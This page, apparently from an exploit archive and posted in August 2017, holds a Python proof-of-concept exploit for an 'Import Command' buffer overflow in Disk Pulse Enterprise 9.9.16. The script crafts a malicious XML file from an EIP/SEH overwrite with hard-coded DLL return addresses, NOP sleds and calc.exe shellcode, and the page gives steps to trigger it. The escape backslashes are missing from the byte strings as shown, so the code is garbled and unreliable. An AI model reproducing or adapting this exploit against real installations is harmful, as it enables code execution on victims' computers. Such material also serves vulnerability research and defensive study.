Home / os / winmobile

Disk Pulse Enterprise 9.9.16 Buffer Overflow

Posted on 22 August 2017

#!/usr/bin/python # Exploit Title : Disk Pulse Enterprise 9.9.16 - 'Import Command' Buffer Overflow # Discovery by : Anurag Srivastava # Email : anurag.srivastava@pyramidcyber.com # Website : www.pyramidcyber.com # Discovery Date : 21/08/2017 # Software Link : http://www.diskpulse.com/setups/diskpulseent_setup_v9.9.16.exe # Tested Version : 9.9.16 # Tested on OS : Windows 7 Ultimate x64bit and Windows 10 Home Edition x64 # Steps to Reproduce: Run the python file to generate pyramid.xml and then open disk pulse software , right click and click on import command . Select pyramid.xml file . import os,struct #offset to eip junk = "A" * (1560) #JMP ESP (QtGui4.dll) jmp1 = struct.pack('<L',0x651bb77a) #NOPS nops = "x90" #LEA EAX, [ESP+76] esp = "x8Dx44x24x4c" #JMP ESP jmp2 = "xFFxE0" #JMP Short nseh = "x90x90xEBx05" #Jump short 5 #POP POP RET (libspp.dll) seh = struct.pack('<L',0x10015FFE) #CALC.EXE shellcode = "x31xdbx64x8bx7bx30x8bx7fx0cx8bx7fx1cx8bx47x08x8bx77x20x8bx3fx80x7ex0cx33x75xf2x89xc7x03x78x3cx8bx57x78x01xc2x8bx7ax20x01xc7x89xddx8bx34xafx01xc6x45x81x3ex43x72x65x61x75xf2x81x7ex08x6fx63x65x73x75xe9x8bx7ax24x01xc7x66x8bx2cx6fx8bx7ax1cx01xc7x8bx7cxafxfcx01xc7x89xd9xb1xffx53xe2xfdx68x63x61x6cx63x89xe2x52x52x53x53x53x53x53x53x52x53xffxd7" # FINAL PAYLOAD evil = junk + jmp1 + nops * 16 + esp + jmp2 + nops * 64 + nseh + seh + nops * 10 + shellcode #FILE file='<?xml version="1.0" encoding="UTF-8"?> <classify name='' + evil + ' </classify>' f = open('pyramid.xml', 'w') f.write(file) f.close()

 

TOP